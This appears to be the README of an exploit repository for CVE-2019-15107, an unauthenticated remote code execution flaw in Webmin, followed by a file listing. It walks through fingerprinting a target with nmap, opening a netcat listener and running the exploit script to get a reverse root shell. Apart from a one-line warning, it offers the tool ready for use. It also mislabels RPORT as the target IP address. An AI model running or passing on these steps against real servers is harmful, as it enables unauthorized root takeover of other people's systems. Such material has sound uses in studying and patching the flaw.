CVE-2019–15107 - Unauthenticated RCE Webmin <=1.920# CVE-2019–15107 - Unauthenticated RCE Webmin <=1.920
This python script should give you a root shell on Webmin 1.890
Check with nmap:
`nmap -sC -sV -p 10000 TARGET_IP`
Result:
`10000/tcp open http MiniServ 1.890 (Webmin httpd)`
How to use this exploit:
Step 1:
`nc -lnvp LPORT`
Step 2:
`chmod +x exploit.py`
./exploit RHOST RPORT LHOST LPORT
RHOST = the target
RPORT = the target IP address (Usually 10000)
LHOST = your kali box
LPORT = your reverse shell port
Step 3:
Get a root shell!
DO NOT HARM UNAUTHORIZED SYSTEMS!!!
[4.0K] /data/pocs/c0daa0401b61daac241d74f82d636f6e6c61427b
├── [ 34K] LICENSE
├── [ 895] README.md
├── [ 62] requirements.txt
└── [1.7K] webmin_exploit.py
0 directories, 4 files